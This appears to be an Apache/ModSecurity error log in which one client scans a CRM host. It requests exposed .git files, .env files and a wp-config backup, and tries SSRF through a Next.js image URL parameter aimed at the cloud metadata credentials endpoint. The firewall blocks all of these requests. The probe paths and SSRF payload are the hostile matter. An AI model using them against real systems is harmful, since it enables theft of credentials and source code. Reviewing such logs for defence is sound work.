[Mon May 11 15:23:11.475050 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.133:2748] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYP1chVQ3tCn0m9OpZIgAAARI"]
[Mon May 11 15:23:11.475234 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.133:2748] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYP1chVQ3tCn0m9OpZIgAAARI"]
[Mon May 11 15:23:11.475897 2026] [security2:error] [pid 1319998:tid 1320021] [client 195.178.110.133:2728] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYP6t2WtvoFr7xvGzUZgAAAJU"]
[Mon May 11 15:23:11.475960 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYP6O9RdIr1DwxYR2SuQAAAMk"]
[Mon May 11 15:23:11.476010 2026] [security2:error] [pid 1319998:tid 1320021] [client 195.178.110.133:2728] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYP6t2WtvoFr7xvGzUZgAAAJU"]
[Mon May 11 15:23:11.476013 2026] [security2:error] [pid 1319953:tid 1319977] [client 195.178.110.133:2784] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYP-SQ-m-m0ukSShuB_wAAAVY"]
[Mon May 11 15:23:11.476066 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYP6O9RdIr1DwxYR2SuQAAAMk"]
[Mon May 11 15:23:11.476127 2026] [security2:error] [pid 1319953:tid 1319977] [client 195.178.110.133:2784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYP-SQ-m-m0ukSShuB_wAAAVY"]
[Mon May 11 15:23:11.476245 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYP6O9RdIr1DwxYR2SuQAAAMk"]
[Mon May 11 15:23:11.476239 2026] [proxy_fcgi:error] [pid 1320398:tid 1320413] [client 195.178.110.133:2804] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.476310 2026] [security2:error] [pid 1319998:tid 1320021] [client 195.178.110.133:2728] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYP6t2WtvoFr7xvGzUZgAAAJU"]
[Mon May 11 15:23:11.476323 2026] [security2:error] [pid 1319953:tid 1319977] [client 195.178.110.133:2784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYP-SQ-m-m0ukSShuB_wAAAVY"]
[Mon May 11 15:23:11.479293 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYP1chVQ3tCn0m9OpZIwAAAQs"]
[Mon May 11 15:23:11.479413 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYP1chVQ3tCn0m9OpZIwAAAQs"]
[Mon May 11 15:23:11.479583 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYP1chVQ3tCn0m9OpZIwAAAQs"]
[Mon May 11 15:23:11.480287 2026] [security2:error] [pid 1320398:tid 1320403] [client 195.178.110.133:2772] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYP-JEyNRN152ArOSM2QAAAEM"]
[Mon May 11 15:23:11.480399 2026] [security2:error] [pid 1320398:tid 1320403] [client 195.178.110.133:2772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYP-JEyNRN152ArOSM2QAAAEM"]
[Mon May 11 15:23:11.480572 2026] [security2:error] [pid 1320398:tid 1320403] [client 195.178.110.133:2772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYP-JEyNRN152ArOSM2QAAAEM"]
[Mon May 11 15:23:11.480602 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYP6t2WtvoFr7xvGzUZwAAAJE"]
[Mon May 11 15:23:11.480719 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYP6t2WtvoFr7xvGzUZwAAAJE"]
[Mon May 11 15:23:11.480895 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYP6t2WtvoFr7xvGzUZwAAAJE"]
[Mon May 11 15:23:11.481029 2026] [security2:error] [pid 1319953:tid 1319972] [client 195.178.110.133:2716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYP-SQ-m-m0ukSShuCAAAAAVE"]
[Mon May 11 15:23:11.481135 2026] [security2:error] [pid 1319953:tid 1319972] [client 195.178.110.133:2716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYP-SQ-m-m0ukSShuCAAAAAVE"]
[Mon May 11 15:23:11.481317 2026] [security2:error] [pid 1319953:tid 1319972] [client 195.178.110.133:2716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYP-SQ-m-m0ukSShuCAAAAAVE"]
[Mon May 11 15:23:11.484976 2026] [security2:error] [pid 1320674:tid 1320703] [client 195.178.110.133:2766] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYP6O9RdIr1DwxYR2SuwAAAM4"]
[Mon May 11 15:23:11.485100 2026] [security2:error] [pid 1320674:tid 1320703] [client 195.178.110.133:2766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYP6O9RdIr1DwxYR2SuwAAAM4"]
[Mon May 11 15:23:11.485491 2026] [security2:error] [pid 1320674:tid 1320703] [client 195.178.110.133:2766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYP6O9RdIr1DwxYR2SuwAAAM4"]
[Mon May 11 15:23:11.485742 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYP6t2WtvoFr7xvGzUaQAAAJg"]
[Mon May 11 15:23:11.486346 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYP6t2WtvoFr7xvGzUaQAAAJg"]
[Mon May 11 15:23:11.486543 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYP6t2WtvoFr7xvGzUaQAAAJg"]
[Mon May 11 15:23:11.493072 2026] [proxy_fcgi:error] [pid 1319885:tid 1319896] [client 195.178.110.133:2764] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.512746 2026] [proxy_fcgi:error] [pid 1319885:tid 1319896] [client 195.178.110.133:2764] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.525312 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYP6t2WtvoFr7xvGzUbQAAAJg"]
[Mon May 11 15:23:11.525939 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYP6t2WtvoFr7xvGzUbQAAAJg"]
[Mon May 11 15:23:11.526122 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYP6t2WtvoFr7xvGzUbQAAAJg"]
[Mon May 11 15:23:11.532235 2026] [proxy_fcgi:error] [pid 1319885:tid 1319896] [client 195.178.110.133:2764] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.545387 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYP6t2WtvoFr7xvGzUbgAAAJg"]
[Mon May 11 15:23:11.545976 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYP6t2WtvoFr7xvGzUbgAAAJg"]
[Mon May 11 15:23:11.546169 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYP6t2WtvoFr7xvGzUbgAAAJg"]
[Mon May 11 15:23:11.548328 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-SQ-m-m0ukSShuCBgAAAUE"]
[Mon May 11 15:23:11.548443 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-SQ-m-m0ukSShuCBgAAAUE"]
[Mon May 11 15:23:11.548631 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-SQ-m-m0ukSShuCBgAAAUE"]
[Mon May 11 15:23:11.551679 2026] [proxy_fcgi:error] [pid 1320398:tid 1320412] [client 195.178.110.133:2712] AH01071: Got error 'Primary script unknown'
